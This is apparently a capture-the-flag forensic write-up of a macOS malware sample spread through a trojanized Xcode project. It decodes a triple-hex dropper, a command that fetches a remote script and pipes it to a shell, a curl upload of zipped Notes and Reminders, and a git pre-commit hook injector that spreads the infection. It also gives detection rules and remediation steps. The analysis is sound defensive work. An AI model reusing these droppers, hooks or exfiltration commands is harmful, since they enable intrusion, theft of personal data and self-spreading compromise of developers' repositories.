Week 1 - First Tracks#

Question 1: Initial Download Vector#

Q: Analyze the pcap file. What URL did the malware download the first stage from? What user-agent sent the request?

Answer:

1
The malware downloaded the first stage from http://bu1knames.io/a using the user-agent curl/8.7.1

Analysis:

• Initial project download: http://192.168.67.1:8080/jargal.karlsen/starter-project/archive/main.zip (Safari browser)
• After infection, C2 communication switched to curl
• C2 Server: bu1knames.io with multiple endpoints (/a, /l, /s/*, /i, /n)
• User-Agent changed from Safari to curl/8.7.1 post-infection

Key Indicators:

• Frame 17230: First curl request to C2
• HTTP GET request to http://bu1knames.io/a
• Response delivered executable payloads

Question 2: Payload Obfuscation Method#

Q: How does the C2 server obfuscate its payloads?

Answer:

1
Base64 encoding (nested/double-encoded) in AppleScript payloads

Technical Details:

1. Multi-Layer Base64 Encoding:

   • Payloads like cozfi_xhh and jez contained 7 layers of base64 encoding
   • Each layer decoded to another base64 string
   • Final layer revealed executable AppleScript code

2. AppleScript Wrappers:

   1
   try
   2
       do shell script "osascript -e \"$(echo [BASE64]... | base64 -d)\""
   3
   end try
   

3. Nested Execution:

   • Outer AppleScript executes inner base64-decoded AppleScript
   • Inner AppleScript decodes and executes shell commands
   • Creates analysis difficulty by separating code layers

Example Decoding Process:

1
# Layer 1  2  3  4  5  6  7 (final payload)
2
base64 -d  base64 -d  base64 -d  base64 -d  base64 -d  base64 -d  base64 -d

Additional Obfuscation:

• Initial dropper uses triple hex encoding (Question 6)
• URL encoding for exfiltrated data
• Meaningless variable names

Question 3: looz Payload Analysis#

Q: Analyze the looz payload. What information does it extract from the victim machine?

Answer:

1
The malware executes an embedded Python script to query LaunchServices plist files and determine the default browser for the HTTPS scheme, retrieves the macOS version using sw_vers -productVersion, extracts the Safari version from the CFBundleShortVersionString field in Safari.app's Info.plist, obtains the system locale via defaults read -g AppleLocale, checks the Application Firewall status with /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate, verifies System Integrity Protection status using csrutil status, collects CPU details through sysctl -n machdep.cpu.brand_string and sysctl -n hw.ncpu, concatenates all collected data into a URL-encoded string formatted as h=[browser]&v=[mac_version]&sv=[safari_version]&locale=[locale]&f=[firewall]&sip=[sip]&c=[cpu], exfiltrates it to http://bu1knames.io/i via an HTTP POST request using curl, and then sequentially downloads and executes five additional modules: seizecj, fpfb, cozfi_xhh, txzx_vostfdi, and jez.

Technical Breakdown:

1. System Information Collected:

• Default Browser: Python script queries ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
• macOS Version: sw_vers -productVersion Result: 15.6.1
• Safari Version: Reads /Applications/Safari.app/Contents/Info.plist CFBundleShortVersionString field Result: 18.6
• System Locale: defaults read -g AppleLocale Result: en_US
• Firewall Status: /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate Result: Disabled
• SIP Status: csrutil status Result: enabled
• CPU Information: sysctl -n machdep.cpu.brand_string and sysctl -n hw.ncpu Result: Apple M3 Pro (Virtual)

2. Data Exfiltration Format:

1
POST /i HTTP/1.1
2
Host: bu1knames.io
3
Content-Type: application/x-www-form-urlencoded
4

5
h=[browser]&v=[mac_version]&sv=[safari_version]&locale=[locale]&f=[firewall]&sip=[sip]&c=[cpu]

Example from PCAP (Frame 17345):

1
v=15.6.1&sv=18.6&locale=en_US&f=Disabled&sip=enabled&c=Apple M3 Pro (Virtual)&s=ZDWTX8G9O

3. Payload Chain Initiated: After exfiltration, looz triggers sequential download and execution:

1. seizecj (15KB)
2. fpfb (5.5KB)
3. cozfi_xhh (13KB)
4. txzx_vostfdi (44KB)
5. jez (14KB)

Purpose: Comprehensive system profiling to determine:

• Security posture (firewall/SIP status)
• Target value (OS version, CPU type)
• Detection evasion (browser fingerprinting)
• Next-stage payload compatibility

Question 4: cozfi_xhh Payload Analysis#

Q: Analyze the cozfi_xhh payload. What information does it extract from the victim machine?

Answer:

1
cozfi_xhh extracts and exfiltrates:
2
Apple Notes data from ~/Library/Group Containers/group.com.apple.notes/
3
Apple Reminders data from ~/Library/Reminders/
4
Serial number from system_profiler SPHardwareDataType
5
It zips Notes+Reminders and uploads to http://bu1knames.io/n?s=<serial>.

Technical Analysis:

Payload Details:

• Size: 13KB (obfuscated)
• Layers: 7 nested base64 encodings
• Final decoded size: 1,682 bytes (AppleScript)

Extraction Process:

1. Create Backup Directory:

   1
   set backupDir to (path to home folder as text) & "Backups:Notes_Reminders_" & timestamp & ":"
   2
   tell application "Finder" to make new folder at (path to home folder) with properties {name:"Backups"}
   

2. Copy Apple Notes Data:

   1
   cp -R "~/Library/Group Containers/group.com.apple.notes/" "$BACKUP_DIR/Notes/"
   

   • Contains: All user Notes content, attachments, metadata
   • File format: SQLite databases with encrypted attachments

3. Copy Apple Reminders Data:

   1
   cp -R "~/Library/Reminders/" "$BACKUP_DIR/Reminders/"
   

   • Contains: Reminder items, due dates, lists, categories

4. Extract Serial Number:

   1
   system_profiler SPHardwareDataType | grep 'Serial Number (system)' | awk '{print $NF}'
   

   • Used for victim identification and tracking
   • Example: ZDWTX8G9O

5. Create Archive:

   1
   cd "$BACKUP_DIR" && zip -r "backup.zip" Notes/ Reminders/
   

6. Exfiltrate Data:

   1
   curl -X POST -F "file=@backup.zip" "http://bu1knames.io/n?s=$SERIAL_NUMBER"
   

7. Cleanup:

   1
   tell application "Finder" to delete backupDir
   

Data Value:

• Personal Information: Notes often contain passwords, account details, private thoughts
• Business Intelligence: Reminders may include meeting schedules, project deadlines, sensitive tasks
• Persistence: Serial number enables tracking across OS reinstalls

OPSEC Failure:

• Unencrypted HTTP transmission
• No anti-forensics (deleted files recoverable from/tmp)
• Detectable via endpoint monitoring (sudden zip creation + curl upload)

Question 5: Propagation Mechanism#

Q: How does the malware attempt to infect other devices? Which payload is responsible for this behavior?

Answer:

1
Method: infects local Git repositories by writing malicious .git/hooks/pre-commit hooks
2
Payload responsible: jez
3
The injected hook executes an obfuscated command that runs curl -fskL -d 'p=git' http://bu1knames.io/a | sh in background, enabling onward infection via shared/cloned repos.

Technical Analysis:

Payload Details:

• Responsible payload: jez (14KB, 7 layers base64)
• Final decoded size: 1,821 bytes
• Execution timing: Last payload in infection chain

Infection Mechanism:

1. Find Git Repositories:

   1
   find ~ -type d -name '*.git' -maxdepth 6
   

   • Searches user’s home directory for all Git repos
   • Includes personal projects, cloned repositories, development work
   • Max depth: 6 subdirectories (performance optimization)

2. Check Existing Hooks:

   1
   if [ -f ".git/hooks/pre-commit" ]; then
   2
       # Append to existing hook
   3
   else
   4
       # Create new hook
   5
   fi
   

3. Inject Malicious Pre-Commit Hook:

   1
   cat >> .git/hooks/pre-commit <<'EOF'
   2
   #!/bin/bash
   3
   jfzHxasoxLota() {
   4
       # Multi-layer xxd-encoded curl command
   5
       echo '[HEX]' | xxd -p -r | xxd -p -r | sh &
   6
   }
   7
   jfzHxasoxLota &
   8
   EOF
   9
   chmod +x .git/hooks/pre-commit
   

4. Obfuscated Payload Execution:

   1
   # Decoded final command:
   2
   curl -fskL -d 'p=git' http://bu1knames.io/a | sh &
   

   • -f: Fail silently on HTTP errors
   • -s: Silent mode (no progress bar)
   • -k: Insecure (ignore SSL warnings)
   • -L: Follow redirects
   • -d 'p=git': POST data indicating infection vector
   • &: Background execution (no commit delay)

Propagation Flow:

1
Developer commits code
2

3
Pre-commit hook triggers
4

5
Malware beacon to C2
6

7
Downloads fresh payload
8

9
Infects local system
10

11
Developer pushes to remote repo OR shares project
12

13
Other developers clone/pull
14

15
Infection spreads exponentially

Why This Is Effective:

1. Trust-Based Spread:

   • Developers trust their own repositories
   • Corporate repos may lack malware scanning for Git hooks
   • Code review processes don’t examine .git/ directory

2. Stealth:

   • Pre-commit hooks are common in development workflows
   • Background execution doesn’t interrupt commits
   • No visible indication of infection

3. Persistence:

   • Survives across git pull/checkout operations
   • Can’t be removed by typical cleanup commands
   • Reinstalls itself if .git/hooks/ is recreated

4. Scale:

   • One infected developer can compromise entire teams
   • Infects all local repos (potentially dozens)
   • Supply chain attack potential if upstream repos infected

Detection:

1
# Find suspicious pre-commit hooks
2
find ~ -name "pre-commit" -path "*/.git/hooks/*" -exec grep -l "curl.*bu1knames.io" {} \;
3

4
# Check for xxd-encoded commands
5
find ~ -name "pre-commit" -path "*/.git/hooks/*" -exec grep -l "xxd -p -r" {} \;

Mitigation:

• Audit all .git/hooks/ directories in repos
• Use git config core.hooksPath to centralize hook management
• Implement EDR monitoring for curl-from-git-hook patterns
• Code sign Git hooks and verify signatures

Question 6: Initial Infection File#

Q: What file contained the initial malware? How is the initial payload obfuscated?

Answer:

1
The initial malware was contained in the file xcassets.sh located at:
2
starter-project/MarkdownEditor.xcodeproj/xcuserdata/.xcassets/xcassets.sh
3

4
The initial payload is obfuscated using triple hex encoding. The malicious command is encoded three times and decoded using echo [hex_string] | xxd -p -r | xxd -p -r | xxd -p -r | sh, which ultimately executes curl -fskL http://bu1knames.io/a to download the next stage.

Technical Analysis:

File Details:

• Location: starter-project/MarkdownEditor.xcodeproj/xcuserdata/.xcassets/xcassets.sh
• Size: 369 bytes
• Permissions: Executable (chmod +x)
• Disguise: Asset compilation script (legitimately-named)

Obfuscation: Triple Hex Encoding

Layer 1 - Visible in file:

1
#!/usr/bin/env bash
2
x=$(echo '3363333337353337...' | xxd -p -r | xxd -p -r | xxd -p -r | sh)
3
bash -c "$x"
4
sleep 2
5
bash /tmp/.o.txt

Decoding Process:

First xxd decode (hex text):

1
3363333337353337...
2
     xxd -p -r
3
6333733563...

Second xxd decode (hex text):

1
6333733563...
2
     xxd -p -r
3
63757266...

Third xxd decode (hex text):

1
63757266...
2
     xxd -p -r
3
curl -fskL http://bu1knames.io/a > /tmp/.o.txt

Final Decoded Payload:

1
curl -fskL http://bu1knames.io/a > /tmp/.o.txt
2
bash /tmp/.o.txt

Why Triple Hex Encoding?

1. Static Analysis Evasion:

   • String analysis tools won’t detect “curl” or “bu1knames.io”
   • Antivirus signatures based on known malware patterns fail
   • File appears as random hex data

2. Human Review Evasion:

   • Hex resembles asset data or configuration
   • .xcassets folder expected to contain binary/hex data
   • Analyst fatigue - triple encoding discourages manual decoding

3. Network Detection Evasion:

   • No hardcoded C2 domain in plain text
   • File hash won’t match known malware databases
   • Polymorphic - each build can use different encoding

Execution Trigger:

The malware likely executes through:

1. Xcode Build Phase: Project configured to run xcassets.sh during compilation
2. Manual Execution: Developer runs script thinking it’s project setup
3. Automated CI/CD: Build pipeline executes all project scripts

Hidden in Plain Sight:

• .xcassets is a legitimate Xcode folder for app resources (images, icons)
• Developer expects scripts in .xcodeproj directories
• xcuserdata/ folder typically excluded from version control (gitignore)
• File name suggests asset processing workflow

Detection:

1
# Find suspicious xxd usage in scripts
2
find . -name "*.sh" -exec grep -l "xxd -p -r.*xxd -p -r" {} \;
3

4
# Check .xcassets for shell scripts (abnormal)
5
find . -path "*/.xcassets/*.sh" -type f

Phase 1: Social Engineering & Initial Compromise#

Frames 13501-14061

Key Insight: Malware distributed via internal Git repository - high trust environment.

Phase 2: Malware Execution & C2 Beacon#

Frames 17230-17268

User-Agent Change: Safari curl/8.7.1 (indicator of compromise)

Phase 3: System Reconnaissance & Profiling#

Frames 17345-17407

Phase 4: Data Exfiltration#

Frames 17429

Phase 5: Persistence & Propagation#

Frames 17452-17555

Module Summary#

C2 Infrastructure#

Domain: bu1knames.io
Protocol: HTTP (unencrypted)
Transport: Port 80

Endpoints:

Network Indicators#

Domains:

1
bu1knames.io

HTTP Patterns:

1
User-Agent: curl/8.7.1 (from non-terminal processes)
2
POST /i with URL-encoded system data
3
GET /s/<payload_name>
4
POST /n?s=<serial> with ZIP file upload

Suspicious Traffic:

• Xcode process making curl requests
• Background HTTP POSTing system information
• Unencrypted file uploads from Notes/Reminders directories

File System Indicators#

Malicious Files:

1
/tmp/.o.txt                                    # Downloaded C2 payload
2
~/*/xcuserdata/.xcassets/xcassets.sh          # Initial dropper
3
~/.git/hooks/pre-commit                       # Injected by jez
4
~/Backups/Notes_Reminders_*/                  # Temporary exfiltration directory

Suspicious Patterns:

1
# Find triple-hex encoded scripts
2
grep -r "xxd -p -r.*xxd -p -r.*xxd -p -r" ~/
3

4
# Find Git hook infections
5
find ~ -name "pre-commit" -path "*/.git/hooks/*" -exec grep -l "bu1knames.io" {} \;
6

7
# Detect multi-layer base64 in scripts
8
grep -r "base64 -d.*base64 -d" /tmp/

Process Indicators#

Suspicious Commands:

1
curl -fskL http://bu1knames.io/*              # C2 communication
2
xxd -p -r | xxd -p -r | xxd -p -r             # Triple hex decoding
3
osascript -e "$(echo <base64> | base64 -d)"   # Nested AppleScript execution
4
system_profiler SPHardwareDataType            # Serial number extraction
5
csrutil status                                 # SIP reconnaissance
6
/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate  # Firewall check

Process Trees:

1
Xcode
2
   xcassets.sh
3
       bash
4
           curl (bu1knames.io)
5
               osascript
6
                   system_profiler

Behavioral Indicators#

1. Build-Time Network Activity: Xcode projects executing network requests during compilation
2. Git Hook Modifications: Unexpected changes to .git/hooks/pre-commit
3. Data Staging: Temporary backup directories created in ~/Backups/
4. File Zipping: Notes/Reminders directories being archived
5. Background curl: curl processes spawned by non-interactive shells

YARA Rules#

1
rule MacMalware_GitInfector_jez {
2
    meta:
3
        description = "Detects jez Git hook injector malware"
4
        author = "CTF Analysis"
5
        date = "2026-03-04"
6

7
    strings:
8
        $git_find = "find ~ -type d -name '*.git'"
9
        $hook_path = ".git/hooks/pre-commit"
10
        $curl_pattern = "curl -fskL"
11
        $bu1knames = "bu1knames.io/a"
12
        $background_exec = "sh &" nocase
13
        $xxd_decode = "xxd -p -r"
14

15
    condition:
16
        3 of them
17
}
18

19
rule MacMalware_TripleHexEncoding {
20
    meta:
21
        description = "Detects triple hex encoding obfuscation"
22
        author = "CTF Analysis"
23

24
    strings:
25
        $pattern = /echo\s+['"][0-9a-f]{100,}['"].*xxd -p -r.*xxd -p -r.*xxd -p -r/
26

27
    condition:
28
        $pattern
29
}

Sigma Rules#

1
title: Mac Malware C2 Communication via curl
2
status: experimental
3
description: Detects curl communicating with bu1knames.io C2 server
4
references:
5
    - Internal CTF Analysis
6
tags:
7
    - attack.command_and_control
8
    - attack.t1071.001
9
logsource:
10
    product: macos
11
    category: network
12
detection:
13
    selection:
14
        process_name: 'curl'
15
        destination_domain: 'bu1knames.io'
16
    condition: selection
17
falsepositives:
18
    - Legitimate curl usage (very low)
19
level: critical
20

21
---
22

23
title: Git Pre-Commit Hook Execution with curl
24
status: experimental
25
description: Detects malicious pre-commit hooks downloading payloads
26
references:
27
    - Internal CTF Analysis
28
tags:
29
    - attack.persistence
30
    - attack.t1546.004
31
logsource:
32
    product: macos
33
    category: process_creation
34
detection:
35
    selection:
36
        parent_process: 'git'
37
        process_name: 'curl'
38
        command_line|contains:
39
            - 'curl -fskL'
40
            - 'http://*/a'
41
    condition: selection
42
falsepositives:
43
    - CI/CD pipelines with legitimate Git hooks
44
level: high

Snort Rules#

1
# Detect C2 beacon to bu1knames.io
2
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
3
    msg:"MALWARE Mac Git Infector C2 Beacon";
4
    flow:to_server,established;
5
    content:"Host: bu1knames.io";
6
    http_header;
7
    content:"curl/";
8
    http_user_agent;
9
    classtype:trojan-activity;
10
    sid:1000001;
11
    rev:1;
12
)
13

14
# Detect Notes/Reminders upload
15
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
16
    msg:"MALWARE Mac Notes Exfiltration";
17
    flow:to_server,established;
18
    content:"POST";
19
    http_method;
20
    content:"/n?s=";
21
    http_uri;
22
    content:"bu1knames.io";
23
    http_header;
24
    classtype:data-exfiltration;
25
    sid:1000002;
26
    rev:1;
27
)

Immediate Actions#

1. Network Isolation:

   1
   # Block C2 domain at firewall/DNS
   2
   echo "0.0.0.0 bu1knames.io" >> /etc/hosts
   

2. Kill Malicious Processes:

   1
   # Find and kill suspicious curl processes
   2
   pkill -f "curl.*bu1knames.io"
   3
   
   4
   # Kill suspicious osascript processes
   5
   ps aux | grep osascript | grep -v grep | awk '{print $2}' | xargs kill -9
   

3. Check Git Hooks:

   1
   # Audit all pre-commit hooks
   2
   find ~ -name "pre-commit" -path "*/.git/hooks/*" -exec cat {} \; | grep -i "curl\|wget\|xxd"
   

4. Remove Malware Files:

   1
   # Remove temporary payloads
   2
   rm -rf /tmp/.o.txt /tmp/*.decoded
   3
   
   4
   # Clean backup directories
   5
   rm -rf ~/Backups/Notes_Reminders_*
   

Forensic Collection#

Before cleanup, collect evidence:

1
# Network connections
2
lsof -i -P | grep -E "curl|osascript" > network_connections.txt
3

4
# Running processes
5
ps auxww > running_processes.txt
6

7
# Git hooks
8
find ~ -name "pre-commit" -path "*/.git/hooks/*" -exec tar czf git_hooks_evidence.tar.gz {} +
9

10
# System logs
11
log show --predicate 'process == "curl" OR process == "osascript"' --style syslog --last 24h > system_logs.txt
12

13
# Network traffic (if available)
14
tcpdump -i any -w post_infection_traffic.pcap host bu1knames.io

Long-Term Prevention#

1. Code Signing for Git Hooks:

   1
   # Require signed Git hooks
   2
   git config --global core.hooksPath /usr/local/share/git-core/templates/hooks
   

2. Application Firewall:

   1
   # Enable and configure firewall
   2
   sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
   3
   sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on
   

3. EDR Deployment:

   • Deploy endpoint detection (Falcon, SentinelOne, etc.)
   • Monitor for osascript/curl process trees
   • Alert on Git hook modifications

4. Developer Training:

   • Review all cloned projects before execution
   • Inspect Xcode build phases
   • Never run unknown shell scripts from projects
   • Use virtual machines for untrusted code

5. Network Monitoring:

   • Alert on curl from non-terminal processes
   • Monitor POST requests with system information
   • Block HTTP (enforce HTTPS)

Attacker Techniques#

1. Social Engineering:

   • Trojanized legitimate development project
   • Leveraged internal Git repository trust
   • Targeted developer onboarding workflow

2. Defense Evasion:

   • Multi-layer encoding (3x hex, 7x base64)
   • Living-off-the-land binaries (curl, osascript, system_profiler)
   • Background execution (no user interaction)
   • Cleanup of temporary artifacts

3. Persistence & Propagation:

   • Git hook injection for ongoing reinfection
   • Worm-like spreading via shared repositories
   • Supply chain attack potential

4. Data Exfiltration:

   • Targeted high-value data (Notes, Reminders)
   • Serial number for victim tracking
   • Comprehensive system profiling

Defensive Gaps#

1. Trust Model:

   • Internal Git repositories assumed safe
   • No malware scanning of developer tools
   • Build scripts executed without review

2. Detection:

   • No endpoint monitoring for Xcode network activity
   • Git hooks not audited
   • Base64/hex encoding bypassed static analysis

3. Network Security:

   • Unencrypted HTTP allowed
   • No egress filtering for developer systems
   • C2 traffic not detected by IDS/IPS

Improvements#

1. Technical Controls:

   • Deploy EDR on all developer machines
   • Implement Git hook signing/validation
   • Network segmentation for dev environment
   • DNS sinkholing for known-bad domains

2. Process Controls:

   • Code review for all project resources (including scripts)
   • Mandatory repository scanning before clone
   • Baseline system configurations
   • Regular Git hook audits

3. User Awareness:

   • Security training for developers
   • Incident reporting procedures
   • Trust-but-verify culture